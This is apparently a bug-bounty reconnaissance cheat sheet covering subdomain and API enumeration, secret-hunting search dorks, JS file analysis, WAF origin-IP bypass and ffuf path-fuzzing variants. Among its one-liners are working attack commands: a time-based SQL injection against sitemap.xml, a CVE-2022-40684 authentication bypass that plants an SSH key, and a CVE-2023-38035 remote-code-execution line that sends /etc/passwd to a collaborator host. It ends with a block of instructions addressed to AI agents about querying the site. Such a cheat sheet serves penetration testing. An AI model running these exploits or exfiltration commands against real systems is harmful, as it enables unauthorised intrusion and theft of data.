# Reconnaissance ## Subdomain Enumeration > **Tools** * * * * * * > **Write ups** * * [#subdomain-enumeration](#subdomain-enumeration "mention") ## API Recon 1. Check for documentation * Swagger -> `/openapi.json` * GraphQL -> -> * manual -> `site:target.tld intitle:api | developer` 2. Search for APIs * `site:target.tld inurl:api` * `intitle:"index of" "api.yaml" site:target.tld` * `intitle:"index of" intext:"apikey.txt" site:target.tld` * `allintext:"API_SECRET*" ext:env | ext:yml site:target.tld` 3. Enumerate endpoints / methods * * swagger -> * Tools -> [ffuf](https://github.com/ffuf/ffuf#post-data-fuzzing) -> [kiterunner](https://github.com/assetnote/kiterunner) ## One-liners & Quick Wins ```bash # Grep emails and other PII Data from URLs file grep -E -o '\\\\\\\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\\\\\.[a-zA-Z]{2,}\\\\\\\\b' urls.txt #Extract Endpoints from JavaScript cat FILE.js | grep -oh "\\\\\\\\"\\\\\\\\/[a-zA-Z0-9_/?=&]&\\\\\\\\""| sed -e 's/^"//' -e 's/"$//' | sort -u #Get CIDR & Org Information from Target Lists for HOST in $(cat HOSTS.txt); do echo (for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\\\\\\\\|Organization" | tr -s " | paste -; done | uniq); done " #Prototype Pollution subfinder -d HOST -all -silent ❘ httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\\\\\\\/?_proto_[testparam]=exploit\\\\\\\\//' FILE.txt | page- fetch -j 'window.testparam == "exploit"? "[VULNERABLE]": "[NOT VULNERABLE]" | sed "s/(//g" sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" ' # Sitemap SQL Injection cat urls.txt | httpx -silent -path 'sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10' # Authentication Bypass (CVE-2022-40684) POC --> ffuf -w "host_list.txt:URL" -u "" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r ## CVE-2023-26256 -> git clone python3 CVE-2023-26256.py -h # CVE-2023-38035 - Unauth. RCE python3 -c "from pyhessian.client import HessianProxy as H; H('https://TARGET-DOMAIN:8443/mics/services/MICSLogService').uploadFileUsingFileInput({'command': 'curl -X POST -d @/etc/passwd [BURP-COLLABORATOR-URL.com](https://burp-collaborator-url.com/)', 'isRoot': True}, None)" # Quick Port Scanning with Fuzzing cat ips.txt|naabu -silent -tp 1000 -o top1k.txt;cat top1k.txt|grep -vE ':80|:443' | httpx -silent -fc 400,503,204,405 -o httpx.txt;cat httpx.txt|python3 [dirsearch.py](https://dirsearch.py/) --stdin -e '*' -t 60 -w onelistforall.txt -i 200,301,302 --format plain -o report.txt # SSRF use Autorize Exxtension Match and replace https?://(www.)?[-a-zA-Z0–9@:%.+~#=]{1,256}.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%+.~#?&//=]*) ``` *** ## Fingerprinting * Port Scanning ```bash # Before installation sudo apt install libpcap-dev sudo apt-get --assume-yes install git make gcc #masscan git clone cd masscan make sudo make install sudo setcap CAP_NET_RAW+ep /usr/bin/masscan sudo apt install python3 python3-pip # install jfscan git clone cd jfscan cd jfscan # incase of error running export PATH="$HOME/.local/bin:$PATH" ``` * Waf Detect ```bash nuclei -l urls.txt -t nuclei_templates/waf sudo apt install wafw00f wafw00f -l urls.txt ``` * [**uncover**](https://github.com/projectdiscovery/uncover) >> discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools. ```python # installation go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest # configuration file $HOME/.config/uncover/provider-config.yaml # usage uncover -q "test.com" -e censys,fofa,shodan ``` ## JS Files > **Tools** * [Scripts/python scripts/JS\_Leaks\_spider.py](https://github.com/h0tak88r/Scripts/blob/main/python%20scripts/JS_Leaks_spider.py) * Use This Extension to analyse JS Files [FindSomething - Chrome Web Store (google.com)](https://chrome.google.com/webstore/detail/findsomething/kfhniponecokdefffkpagipffdefeldb/related) * [Can analyzing javascript files lead to remote code execution? | by Asem Eleraky | Medium](https://melotover.medium.com/can-analyzing-javascript-files-lead-to-remote-code-execution-f24112f1aa1f) ```bash # Collect JS Files katana -list targets.txt -jc | grep “\\.js$” | uniq | sort -u | tee JS.txt # or use gau tool cat targets.txt | gau | grep “\\.js$” | uniq | sort -u | tee JS2.txt # Analyzing JS files nuclei -l JS.txt -t ~/nuclei-templates/exposures/ -o js_exposures_results.txt nuclei -l JS2.txt -t ~/nuclei-templates/exposures/ -o js_exposures_results.txt cat Js_urls.txt | Mantra # Download all JS files file="JS.txt" while IFS= read -r link do wget "$link" done < "$file" file="JS2.txt" while IFS= read -r link do wget "$link" done < "$file" # Use This Regex to search for sensitive info grep -r -E "aws_access_key|aws_secret_key|api key|passwd|pwd|heroku|slack|firebase|swagger|aws_secret_key|aws key|password|ftp password|jdbc|db|sql|secret jet|config|admin|pwd|json|gcp|htaccess|.env|ssh key|.git|access key|secret token|oauth_token|oauth_token_secret|smtp|GTM-" *.js ``` ## Bypass WAF and Find Origin IPs ### Using hakoriginfinder * References: * * 1. Discover your target's ASN and check [https://bgp.he.net/AS33848#\_prefixes…](https://t.co/0pQS70hOLL) 2. Make a note of the target's IP range. 3. Assuming you have a WAF-protected domain called example\[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter: ```bash prips 93.184.216.0/24 | hakoriginfinder -h example.com ``` If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF ### Using Netlas/Shodan * 1. Go to [Netlas](https://app.netlas.io/registration/), [shodan](https://www.shodan.io/), SecurityTrails or other similar platforms 2. Make filters like `http.title:"My_target_title"` 3. Sometyimes There is Origin IPs exposed ## Fuzzing Tips ````http Use Some Hash's And Encoding Algorithm's (MD5 , SHA-1 , SHA-256 , base32 , base64 , etc . . . ) From Most Common WordList Content Discovery With Common Extensions , Say : https://example*com/.php https://example*com/Fuzz/.php https://example*com/Fuzz/.asp , . . . -- Use Random Bytes With base64 To Fuzz Sensitive Fails , With Extension Or Not , Say: https://example*com/path/.php https://example*com/path/ -- - Generate Wordlist Examples ``` cat common.txt | while read word; do echo -n "$word" | base64 | tee -a base64-wordlist.txt ; done cat wordlist.txt | while read word; do echo -n "$word" | md5sum | cut -d ' ' -f1 | tee -a MD5-Hashs.txt; done ``` uploads => 5128f35c9b4be13788ba41bdb6d1fc1f cmd => dfff0a7fa1a55c8c1a4966c19f6da452 index => aW5keAo= . . . https://examples*com/path/5128f35c9b4be13788ba41bdb6d1fc1f https://examples*com/path/dfff0a7fa1a55c8c1a4966c19f6da452.php https://examples*com/path/aW5keAo=.bak . . . - Say In Ffuf ffuf -w MD5-Hashs.txt:/W1 -w extensions.txt:/W2 -u "https://example*com/path/W1.W2" -mc 200 ffuf -w base64-wordlist.txt:/W1 -w extensions.txt:/W2 -u "https://example*com/path/W1.W2" -mc 200 -- U Can After get 200 Status Code From Fails With Extension , Discover Parameters Using (arjun, ParamSpider , etc . . . ) Tools https://examples*com/path/dfff0a7fa1a55c8c1a4966c19f6da452.php?cmd= etc . . . -- ```` {% embed url="" %} ### FFuf Tips {% embed url="" %} ```bash > ffuf -u target.com/FUZZ -w bbFuzzing.txt > ffuf -u target.com/FUZZ -H "Host: 127.0.0.1" -w bbFuzzing.txt > ffuf -u target.com/FUZZ -H "Host: localhost" -w bbFuzzing.txt > ffuf -u target.com/FUZZ.example -w bbFuzzing.txt > ffuf -u target.com/FUZZ.sample -w bbFuzzing.txt > ffuf -u target.com/FUZZ.template -w bbFuzzing.txt > ffuf -u target.com/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/%3B/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/..%3B/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/FUZZ..%2f -w bbFuzzing.txt > ffuf -u target.com/FUZZ%09 -w bbFuzzing.txt > ffuf -u target.com/FUZZ%23 -w bbFuzzing.txt > ffuf -u target.com/FUZZ..%00 -w bbFuzzing.txt > ffuf -u target.com/FUZZ;%09 -w bbFuzzing.txt > ffuf -u target.com/FUZZ;%09.. -w bbFuzzing.txt > ffuf -u target.com/FUZZ;%09..; -w bbFuzzing.txt > ffuf -u target.com/FUZZ;%2f.. -w bbFuzzing.txt > ffuf -u target.com/.FUZZ -w bbFuzzing.txt > ffuf -u target.com/%0AFUZZ -w bbFuzzing.txt > ffuf -u target.com/%0D%0AFUZZ -w bbFuzzing.txt > ffuf -u target.com/%0DFUZZ -w bbFuzzing.txt > ffuf -u target.com/%2e/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/FUZZ%20 -w bbFuzzing.txt > ffuf -u target.com/FUZZ%2520 -w bbFuzzing.txt > ffuf -u target.com/%u002e%u002e/%u002e%u002e/FUZZ -w bbFuzzing.txt > ffuf -u target.com/%2e%2e%2f/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/%2EFUZZ -w bbFuzzing.txt > ffuf -u target.com/FUZZ.old -w bbFuzzing.txt > ffuf -u target.com/FUZZ?.css -w fuzzing.txt > ffuf -u target.com/FUZZ?.js -w fuzzing.txt > ffuf -u target.com/_FUZZ -w bbFuzzing.tx > ffuf -u target.com/FUZZ_ -w bbFuzzing.txt > ffuf -u target.com/_FUZZ_ -w bbFuzzing.txt > ffuf -u target.com/..;/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/..;/..;/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/../FUZZ -w bbFuzzing.txt > ffuf -u target.com/-FUZZ -w bbFuzzing.txt > ffuf -u target.com/~FUZZ -w bbFuzzing.txt > ffuf -u target.com/FUZZ..;/ -w bbFuzzing.txt > ffuf -u target.com/FUZZ;/ -w bbFuzzing.txt > ffuf -u target.com/FUZZ# -w bbFuzzing.txt > ffuf -u target.com/FUZZ/~ -w bbFuzzing.txt > ffuf -u target.com/!FUZZ -w bbFuzzing.txt > ffuf -u target.com/#/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/-/FUZZ/ -w bbFuzzing.txt > ffuf -u target.com/FUZZ~ -w bbFuzzing.txt > ffuf -u target.com/FUZZ/.git/config -w bbFuzzing.txt > ffuf -u target.com/FUZZ/.env -w bbFuzzing.txt > ffuf -u target.com/FUZZ. -w bbFuzzing.txt > ffuf -u target.com/FUZZ/* -w bbFuzzing.txt > ffuf -u target.com/FUZZ/? -w bbFuzzing.txt > ffuf -u target.com/FUZZ -recursive -w fuzzing.txt > ffuf -u target.com/FUZZ -recursive -w fuzzing.txt -e .asp,.aspx,.ashx,.ash,.jsp,.jspx,.php,.js,.dll,.json,.bak,.bkp,.conf,.txt,.py,.zip,.tar.gz,.tar,.7z,.old Any special occasions (cookieless) - IIS + ASP > ffuf -u target.com/(A(ABCD))/FUZZ > ffuf -u target.com/(ABCD)/FUZZ > ffuf -u target.com/(A(XXXXXXXX)F(YYYYYYYY))/FUZZ > ffuf -u target.com/FUZZ/(S(X))/ > ffuf -u target.com/bin::$INDEX_ALLOCATION/FUZZ > ffuf -u target.com/bin::$INDEX_ALLOCATION/FUZZ.dll > ffuf -u target.com/bin::$INDEX_ALLOCATION/FUZZ -e .asp,.aspx,.ashx,.ash,.dll ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sallam.gitbook.io/sec-88/web-appsec/reconnaissance.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.